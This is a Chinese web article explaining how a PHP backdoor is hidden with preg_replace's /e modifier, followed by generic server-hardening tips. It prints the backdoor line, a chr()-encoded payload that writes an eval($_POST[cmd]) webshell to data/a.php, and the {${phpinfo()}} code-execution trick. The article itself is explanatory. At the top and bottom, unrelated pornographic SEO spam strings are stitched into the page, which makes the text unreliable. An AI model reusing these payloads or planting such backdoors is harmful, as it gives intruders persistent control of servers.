<em id="0a85b"><option id="0a85b"></option></em>

<abbr id="0a85b"></abbr>

      <nobr id="0a85b"></nobr>
        <tr id="0a85b"></tr>
        9久久伊人精品综合,亚洲一区精品视频在线,成 人免费va视频,国产一区二区三区黄网,99国产精品永久免费视频,亚洲毛片多多影院,精品久久久无码人妻中文字幕,无码国产欧美一区二区三区不卡
        學習啦 > 學習電腦 > 電腦安全 > 系統安全 >

        利用preg_replace隱藏后門原理是什么

        時間: 加城1195 分享

          在一次幫助朋友檢查服務器的時候,竟然發現這樣的惡意代碼,利用各種查找后門的工具都沒有發現php木馬。怎么回事呢?有可能是某人利用preg_replace隱藏后門,感興趣的朋友下面一起看看!

          方法步驟

          通過分析發現,小黑的訪問的文件發現代碼:

          @preg_replace(“//e”,$_POST['IN_COMSENZ'],”Access Denied”);

          如果你看到這個代碼是不是有的也沒什么問題,但是,這個就是小黑的掩藏的惡意代碼和后門。隱蔽吧,基本上任何查殺軟件都查殺不到。

          preg_replace函數原型:

          mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

          特別說明:

          /e 修正符使 preg_replace() 將 replacement 參數當作 PHP 代碼(在適當的逆向引用替換完之后)。提示:要確保 replacement 構成一個合法的 PHP 代碼字符串,否則 PHP 會在報告在包含 preg_replace() 的行中出現語法解析錯誤。

          上面的代碼是POST接受數據要測試,比較麻煩,如果換成GET獲取數據的話。。。

          舉例:

          echo preg_replace(“/test/e”,$_GET["h"],”jutst test”);

          如果我們提交?h=phpinfo(),phpinfo()將會被執行(使用/e修飾符,preg_replace會將 replacement 參數當作 PHP 代碼執行)。

          如果我們要POST的話,我們測試提交下面的代碼會怎么樣呢?

          h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))

          密文對應的明文是:

          fputs(fopen(data/a.php,w),);

          執行的結果是在/data/目錄下生成一個一句話木馬文件 a.php。

          這個就恐怖了吧。。。。

          再來一個有難度的例子:

          復制代碼代碼如下:

          function test($str)

          {

          }

          echo preg_replace(“/s*[php](.+?)[/php]s*/ies”, ‘test(“\1″)’, $_GET["h"]);

          ?>

          提交 ?h=phpinfo() ,phpinfo()會被執行嗎?

          肯定不會。因為經過正則匹配后, replacement 參數變為’test(“phpinfo”)’,此時phpinfo僅是被當做一個字符串參數了。

          有沒有辦法讓它執行呢?

          當然有。在這里我們如果提交?h={${phpinfo()}},phpinfo()就會被執行。為什么呢?

          在php中,雙引號里面如果包含有變量,php解釋器會將其替換為變量解釋后的結果;單引號中的變量不會被處理。

          注意:雙引號中的函數不會被執行和替換。

          在這里我們需要通過{${}}構造出了一個特殊的變量,’test(“{${phpinfo()}}”)’,達到讓函數被執行的效果(${phpinfo()}會被解釋執行)。

          可以先做如下測試:

          echo “{${phpinfo()}}”; phpinfo會被成功執行了。

          所以,各位查找后門的時候注意查找下。

          OK,說了那么多,也了解了,以上我給的代碼:

          @preg_replace(“//e”,$_POST['IN_COMSENZ'],”Access Denied”);

          看似很正常的代碼,其實就是一個極度危險的代碼,隱藏頗深啊。哈哈。希望對大家有幫助

          補充:校園網安全維護技巧

          校園網絡分為內網和外網,就是說他們可以上學校的內網也可以同時上互聯網,大學的學生平時要玩游戲購物,學校本身有自己的服務器需要維護;

          在大環境下,首先在校園網之間及其互聯網接入處,需要設置防火墻設備,防止外部攻擊,并且要經常更新抵御外來攻擊;

          由于要保護校園網所有用戶的安全,我們要安全加固,除了防火墻還要增加如ips,ids等防病毒入侵檢測設備對外部數據進行分析檢測,確保校園網的安全;

          外面做好防護措施,內部同樣要做好防護措施,因為有的學生電腦可能帶回家或者在外面感染,所以內部核心交換機上要設置vlan隔離,旁掛安全設備對端口進行檢測防護;

          內網可能有ddos攻擊或者arp病毒等傳播,所以我們要對服務器或者電腦安裝殺毒軟件,特別是學校服務器系統等,安全正版安全軟件,保護重要電腦的安全;

          對服務器本身我們要安全server版系統,經常修復漏洞及更新安全軟件,普通電腦一般都是撥號上網,如果有異常上層設備監測一般不影響其他電腦。做好安全防范措施,未雨綢繆。

          相關閱讀:提高服務器安全性的技巧

          1.經常更改系統管理員密碼。---->且密碼最好是大小寫都有

          2.定期更新系統補丁。---->開啟自動更新,并設定到晚上重啟。

          3.檢查系統是否多出超級管理員,檢查是否有帳號被克隆在“開始”>運行中輸入“cmd”>在輸入 net localgroup administrators

          4.在“開始”>運行中輸入“msconfig”檢查隨機啟動的程序和服務,關掉不必要的隨機啟動程序和服務。

          5.服務器上的所有程序盡量安裝程序的最新穩定版。

          6.檢查SERVU是否被創建有執行權限的用戶或者對C盤有讀寫權限的用戶,并且給SERVU設置一個登錄密碼。如果需要請給serv_u設置獨立啟動賬戶。

          7.不要隨意安裝任何的第三方軟件。例如XX優化軟件,XX插件之類的,更不要在服務器上注冊未知的組件。

          8.不要隨意在服務器上使用IE訪問任何網站,杜絕隱患那是必須的。

          9. 檢查系統日志的“安全性”條目,在右側查看近期“審核成功”的登錄

          10.不要在服務器上雙擊運行任何程序,不然怎么中了木馬都不知道。

          11.不要在服務器上用IE打開用戶的硬盤中的網頁,這是危險的行為。

          12.不要在服務器上瀏覽圖片,以前windows就出過GDI 的安全漏洞。

          13.及時的更新病毒庫,查殺病毒。

          14.定時的查看系統各個盤符的磁盤權限,是否為設定的安全權限。

          15.確保你自己的電腦安全,如果自己的電腦不安全,服務器也可能不太安全。


        后門攻擊相關文章:

        1.計算機病毒簡介及預防

        2.常見的WEB攻擊以及解決方法

        3.電腦后門病毒

        4.詳解TP-LINK路由器漏洞可遠程竊取隱私

        5.如何預防和抵制黑客入侵

        4016545 主站蜘蛛池模板: 麻豆精品一区二区视频在线| 免费中文熟妇在线影片| 亚洲人成影院在线观看| 国产亚洲美女精品久久久| 成人又黄又爽又色的视频| 亚洲精品一区二区三区大桥未久| 亚洲熟妇色xxxxx欧美老妇| 999久久久免费精品播放| 亚洲AV永久天堂在线观看| 国产69精品久久久久99尤物| 欧美丰满熟妇xxxx| 国产精品99区一区二区三| 国产免费无遮挡吸奶头视频| 无码人妻一区二区三区精品视频| 日本人成精品视频在线| 久久中文字幕无码一区二区| 国精品午夜福利视频不卡| 欧美中文一区| 无码人妻丝袜在线视频| 国产AV天堂亚洲国产AV天堂| 久久热在线视频精品视频| 一本一道中文字幕无码东京热| 伊人春色激情综合激情网| 全球成人中文在线| 韩国午夜福利片在线观看| 国产精品香蕉在线观看不卡 | 久久久久久久极品内射| 日韩精品中文字幕亚洲| 亚洲伊人久久综合精品| 国产综合精品一区二区在线| 国产女人18毛片水真多1| 色悠悠国产在线视频一线| 成人一区二区三区在线午夜| 久久人妻无码一区二区三区av| 欧美日韩国产va在线观看免费 | 激情中文丁香激情综合| 日韩有码中文字幕av| 精品尤物国产尤物在线看| 国产成人精品亚洲精品日日| 欧美国产日韩在线三区| 开心五月激情五月俺亚洲|